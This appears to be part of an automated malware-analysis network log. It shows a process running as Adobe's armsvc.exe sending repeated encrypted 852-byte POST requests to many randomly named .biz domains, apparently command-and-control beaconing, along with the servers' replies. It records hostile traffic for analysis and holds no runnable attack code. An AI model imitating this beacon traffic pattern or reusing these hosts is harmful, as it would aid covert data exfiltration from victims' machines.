Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.22 | 49171 | 18.141.10.107 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:12:05.069866896 CET | 357 | OUT | POST /ydlpotfktdldc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: knjghuig.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:12:05.069896936 CET | 852 | OUT | Data Raw: 6c 55 cd bd 12 16 af e6 48 03 00 00 35 ea 07 5b 73 21 d0 38 f9 6b 69 a9 46 bd 91 58 19 67 1c 4c ff 5b c6 e3 3b a5 21 b6 61 da 1a b7 54 e8 9c ea 2e 3f e6 0c 39 23 9b 61 44 bc f2 b1 ab 4f 14 08 71 46 8b 38 01 77 ec bb 3d 33 76 24 6d 00 e4 ba 0d de
    Data Ascii: lUH5[s!8kiFXgL[;!aT.?9#aDOqF8w=3v$ma/<[('!QL(A~-<*!@kC1omFTSmwn,{N099ovuM&s+Y=(.10_mI,pi(u<q;8EmJ(l
Nov 28, 2024 12:12:07.188550949 CET | 412 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:12:06 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=ae9ac7ab12da79f958239291fe67bba1|8.46.123.228|1732792326|1732792326|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.22 | 49172 | 82.112.184.197 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:12:07.722009897 CET | 343 | OUT | POST /m HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:12:07.722022057 CET | 852 | OUT | Data Raw: 40 1a 74 a1 9d 8e bb 29 48 03 00 00 26 92 a2 d3 9b 0f 2f a9 80 7a de d1 08 94 17 8a 81 d3 7e 09 8e 6a b8 60 36 ed 67 a1 21 2c b5 f8 74 ec 33 dc 9c 8a de 73 f4 4f f6 2b d0 40 3f 42 82 56 ee 47 4a 1d 08 f7 b2 77 cd dc 1e 1d fb 86 87 fc 4b ba ce 00
    Data Ascii: @t)H&/z~j`6g!,t3sO+@?BVGJwKMW("0)Qx8W*QATEOi457Xcc@r*GJ$|QlnZWc|(Z}Yh2r@}|zi$>-$,WN7%R~


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.22 | 49173 | 82.112.184.197 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:12:29.792757034 CET | 348 | OUT | POST /prfudb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: lpuegx.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:12:29.792785883 CET | 852 | OUT | Data Raw: d5 3d 8d 74 e9 f9 af 4f 48 03 00 00 fb e1 83 6a 60 4b 62 a5 f2 79 2b ef 22 c0 56 af f9 47 70 f4 44 84 c6 fb 08 ad 94 d2 cc 7b 8f dc f8 24 2e 94 81 89 f4 ae 72 32 3c d7 0c 79 22 06 90 7a 00 dd 27 7f 3f 49 55 79 11 06 cd 1b 11 4d 62 7b 32 b2 72 cf
    Data Ascii: =tOHj`Kby+"VGpD{$.r2<y"z'?IUyMb{2r:+\&z%M&at3M3.(e/67"~dCq65vU)x\mFD-"{<UBM[b&Zsvr, [1=<l=_`.Yi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.22 | 49174 | 82.112.184.197 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:12:52.176826000 CET | 350 | OUT | POST /qmufc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:12:52.177009106 CET | 852 | OUT | Data Raw: 64 fe 9b 72 18 18 ef d7 48 03 00 00 56 94 70 a8 9a c2 b6 f3 41 4f ad f1 83 de 27 3e 46 ae ea 8f 06 91 6e c3 d2 49 db 35 2c 8d cb 7a e4 48 91 0c 61 1e b0 a1 3a d7 0f 2a c6 6f 6b ba 20 61 7f 1f 60 ce 18 25 c1 d2 44 29 81 9d 7b 8e 3f 24 34 6a 1e 1b
    Data Ascii: drHVpAO'>FnI5,zHa:*ok a`%D){?$4jwmnI\+UW`Qun0ln$|6XABaRI{nm2+U+j{}caOa*x8jz6GHl&l.l"@rt'`[KXI.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.22 | 49175 | 82.112.184.197 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:14.276232004 CET | 360 | OUT | POST /webejpnbfwojkbv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vjaxhpbji.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:14.276252985 CET | 852 | OUT | Data Raw: 5e b2 f1 30 6c 04 c8 84 48 03 00 00 10 bd 2e 66 e8 2e 24 bc 5b 8b 59 6a 90 47 9c 3e 13 2d 59 94 46 3b d1 ac 27 fd 15 82 2d 8b bb 36 71 b7 37 cb ff 32 1d ba a7 9b db fa c0 01 8b 3c 2d 12 95 5e b3 33 a5 d3 61 be 41 31 21 84 0e 2d 16 f5 12 51 ed f4
    Data Ascii: ^0lH.f.$[YjG>-YF;'-6q72<-^3aA1!-QNCbi2/\lg{`"BZ{@K!:ULMp\5M3_i8'gS`=mB7b#+9NpzfH]\i6W;gZ@0#V(R+}cc'z3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.22 | 49176 | 47.129.31.212 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:36.522104979 CET | 344 | OUT | POST /p HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: xlfhhhm.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:36.522145033 CET | 852 | OUT | Data Raw: f0 a4 05 98 29 49 62 db 48 03 00 00 7f 96 be d4 7e 7b 77 76 95 8e 3d 1f 3a f4 ca 11 e3 ae 92 b7 a5 1a 16 60 b1 da 43 c7 1f 9a cb 9c 15 28 e5 c5 49 f2 49 bf 24 5e fd 98 8c 35 eb f5 62 48 e5 7a fa f7 29 bb 7c 15 ce 0f f1 7d 32 34 56 77 cb 8f cb 17
    Data Ascii: )IbH~{wv=:`C(II$^5bHz)|}24VwI0TB*m9gd}hxr7C+tB\-,v;{'fj'm:*7Fm7W'>Z^Dp9+&{e3b#
Nov 28, 2024 12:13:38.589637041 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:13:38 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=86e371adcf609664bafea5d950f42ae8|8.46.123.228|1732792418|1732792418|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.22 | 49177 | 13.251.16.150 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:38.898021936 CET | 346 | OUT | POST /rkqa HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: ifsaia.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:38.898042917 CET | 852 | OUT | Data Raw: 63 22 76 32 82 f9 8f 4e 48 03 00 00 51 98 50 08 c0 f1 75 34 14 a4 5f 21 20 22 76 00 9e 6d 21 0a 86 99 bd 6b 1f 2e 65 44 8b 23 69 85 4e 08 71 eb ce be 6f 16 90 0d 77 98 47 69 06 ca 6f 2f a1 da 84 65 b1 79 86 f9 45 b5 b3 37 4f 14 7d ea a5 d0 cd d1
    Data Ascii: c"v2NHQPu4_! "vm!k.eD#iNqowGio/eyE7O}f!2,| :`KY$RzhxZ7P{bphc+nB!^7BEpL</)CBTn>_Y:Jx_W^.]^*B.
Nov 28, 2024 12:13:40.919090986 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:13:40 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=c2ac7ee271b91aae2d8bb2e9ece4b57f|8.46.123.228|1732792420|1732792420|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.22 | 49178 | 44.221.84.105 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:41.697468996 CET | 350 | OUT | POST /ovknk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: saytjshyf.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:41.697479010 CET | 852 | OUT | Data Raw: 34 b7 18 ab 7f 4b 41 c2 48 03 00 00 47 fc 7b 69 37 40 59 80 57 cf 6b 04 ac 65 9f 56 84 a6 97 e9 23 50 2b 89 ec 42 26 db 7f b3 19 b9 87 05 24 31 7b 66 3e 6a 2e 9c 3e c7 8a d9 9d 6f e9 cd 0d c1 b0 20 1d df ac bc 06 6c 92 90 39 21 11 88 f4 a8 ba 9f
    Data Ascii: 4KAHG{i7@YWkeV#P+B&$1{f>j.>o l9!i@#Mad>A`%is%eOc9^#1$*$~9-;d {S%iE&~ip(#Zs+-q0z#0kpu#u9%
Nov 28, 2024 12:13:42.839821100 CET | 413 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:13:42 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=90782b53ccaab0baae9adc7f4eb2b143|8.46.123.228|1732792422|1732792422|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.22 | 49179 | 18.141.10.107 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:43.118539095 CET | 345 | OUT | POST /nm HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: vcddkls.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:43.118582010 CET | 852 | OUT | Data Raw: 51 c8 6b dc 27 5f a1 88 48 03 00 00 5d 0f 2d 00 7d e2 a5 63 8e 10 de 76 4c c3 c5 bf a1 cc e5 2d b2 d6 b5 52 2a bc f0 21 a8 1c dd 4c 58 8c fc 5f 17 89 a6 ed 74 e0 4c 45 04 ff 4d 8a 5b 5d d2 a3 99 dd 5b 26 1c 68 8a ad 32 92 ba 88 c9 ac 16 94 25 1d
    Data Ascii: Qk'_H]-}cvL-R*!LX_tLEM[][&h2%wTW^%<P!pKx{{"ggOaP_oB>j-x5l%u1-S[=p|8j:SSUi<?bq*3_#x.T0U
Nov 28, 2024 12:13:45.145045996 CET | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:13:44 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=be09c1d1cb04e6734479abe9670c4e23|8.46.123.228|1732792424|1732792424|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.22 | 49180 | 172.234.222.143 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:45.423217058 CET | 348 | OUT | POST /hwxehcd HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: fwiwk.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:45.423232079 CET | 852 | OUT | Data Raw: c6 5e df ac c7 a2 7b e2 48 03 00 00 ed dd da 6a e4 07 b6 6f 81 c8 e2 be 39 f8 7a 64 b3 b8 79 14 d0 75 30 90 90 89 0f 18 92 26 23 cf 72 e3 84 6d 33 2c 89 88 b0 c9 b3 d8 31 1a 86 ad 78 5b 47 38 c7 9f 66 6a 8c 68 1c d4 38 dd 8f fa f5 66 ef aa bf 16
    Data Ascii: ^{Hjo9zdyu0&#rm3,1x[G8fjh8fANERR/}|,_aCSL[*%kW]<) 4Z6C"^n%}%}5p$Li0kYpyi<pVimYZx9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.22 | 49181 | 172.234.222.143 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:46.793849945 CET | 347 | OUT | POST /kbtuvb HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: fwiwk.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:46.793869019 CET | 852 | OUT | Data Raw: 15 52 f0 09 14 5f e7 0a 48 03 00 00 c1 ba d2 f1 0c ea e7 8f c8 aa 6d a6 b0 39 f9 5d e6 ce a8 86 c2 36 66 af 82 15 bf 2d bd 0e 49 81 e4 8c 33 c4 96 57 df 7a 4e 02 7a 7b de ab c9 57 eb 6e ed ff 5a 80 12 26 16 5b 21 22 f9 ac f4 50 6e 8e 33 08 92 73
    Data Ascii: R_Hm9]6f-I3WzNz{WnZ&[!"Pn3scPKSM,}j\"J_j6Ne*p^' >.BSiq?S)xH(w.D+M_R\05]m/qm$8:vpUw90e?R


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.22 | 49182 | 34.246.200.160 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:48.237174988 CET | 350 | OUT | POST /ebyryipv HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: tbjrpv.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:48.237195015 CET | 852 | OUT | Data Raw: 97 f3 81 25 c4 f4 2d 56 48 03 00 00 1a ee 97 57 ee e1 5c 9f c0 ac 0c 30 34 48 7d 6d b7 ea 3f 3d b0 87 af 6c bf 6e 14 69 11 fb 5b 2b cb 9f b2 94 09 c7 2a 53 d8 d8 bf 14 4d 24 7c 17 e5 a4 35 e3 e1 a1 b2 71 6c cd 01 9f bd 77 c3 77 dd d3 b1 9c 38 84
    Data Ascii: %-VHW\04H}m?=lni[+*SM$|5qlww8ZLtaW3:{A-n{Oo4nJ=??uc=azs=nVn("T=7nK4;nQN?x<U@}Q_JpJ:t:
Nov 28, 2024 12:13:49.618149042 CET | 410 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:13:49 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=03e6de31d47407822d4df08d48d636c5|8.46.123.228|1732792429|1732792429|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.22 | 49183 | 18.208.156.248 | 80 | 3320 | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:50.369756937 CET | 348 | OUT | POST /vhlxvyk HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: deoci.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 852
Nov 28, 2024 12:13:50.369798899 CET | 852 | OUT | Data Raw: a6 2d f4 75 a0 86 52 68 48 03 00 00 a2 fc de 6d 52 a6 20 ea 15 9d a3 a5 a4 f4 37 e8 82 8f 62 7e 05 54 90 8d e5 3e 41 24 41 c1 4c f2 3c 16 bb 66 52 d5 dd 32 39 3c 28 63 0f a6 9c 8d 46 0f fa d3 17 3b e5 e8 3f 75 f0 0e 6d 84 12 4a 86 fc d6 76 5b f9
    Data Ascii: -uRhHmR 7b~T>A$AL<fR29<(cF;?umJv[d9{m$'4e&4CToiEu,Kd{Bq- <\Uz;'Z9l4(y1iS1bo%VOuDmzdycH[anb4Rt
Nov 28, 2024 12:13:51.464062929 CET | 409 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 28 Nov 2024 11:13:51 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=22d8f4e2538382d40c618aef6bf6eed2|8.46.123.228|1732792431|1732792431|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID: 21
Source IP: 192.168.2.22
Source Port: 49184
Destination IP: 208.100.26.245
Destination Port: 80
PID: 3320
Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp | Bytes transferred | Direction | Data
Nov 28, 2024 12:13:51.828934908 CET | 357 | OUT | POST /aphnqtgnwfpgg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:13:51.829282045 CET | 852 | OUT | Data Raw: 5c 95 08 87 f9 87 1f c0 48 03 00 00 a1 4f 10 a6 d0 2a d2 3a 52 6d a0 1c fd e3 ba b3 a4 08 39 f2 1e 88 18 08 56 45 40 2e f6 a8 f0 78 07 fb 89 26 22 b1 73 cb 0f a7 6e 82 55 3b e2 70 c5 ea 70 cc 64 76 e2 eb e2 cf 11 e3 4c 36 6e ad b8 f9 cc 4e 0c e2
Data Ascii: \HO*:Rm9VE@.x&"snU;ppdvL6nN)fRWkt:N.BZz(I :#*?Sx1ZN!CPJRC5jMRX%{(]XZ(mk}%@#<mp4,C(CYw8FU5RNN
Nov 28, 2024 12:13:52.952058077 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 28 Nov 2024 11:13:52 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 28, 2024 12:13:53.367996931 CET | 352 | OUT | POST /cmjndgqt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 852
Nov 28, 2024 12:13:53.368021965 CET | 852 | OUT | Data Raw: a7 28 0e 0d 2a f7 d8 4a 48 03 00 00 c9 fb 88 64 74 5f c8 3a 25 9a 9b 94 cf 4e 51 1a a3 39 43 7b 2e 29 7a 2c 77 e3 0b 15 ca 82 42 c3 8e 40 4d 79 06 d8 cf 84 9f 2e a2 b4 36 97 46 33 8d c3 89 a6 fa f0 6c ef 72 c9 a8 b9 f7 89 a8 06 78 59 9d 39 05 8b
Data Ascii: (*JHdt_:%NQ9C{.)z,wB@My.6F3lrxY9$wn]/Np_)S_@?9Io\^\@GET2 ~/-L2jY/}1mVa1JUwX^'{NF)'H_%([xATDA3{
Nov 28, 2024 12:13:53.701627016 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 28 Nov 2024 11:13:53 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
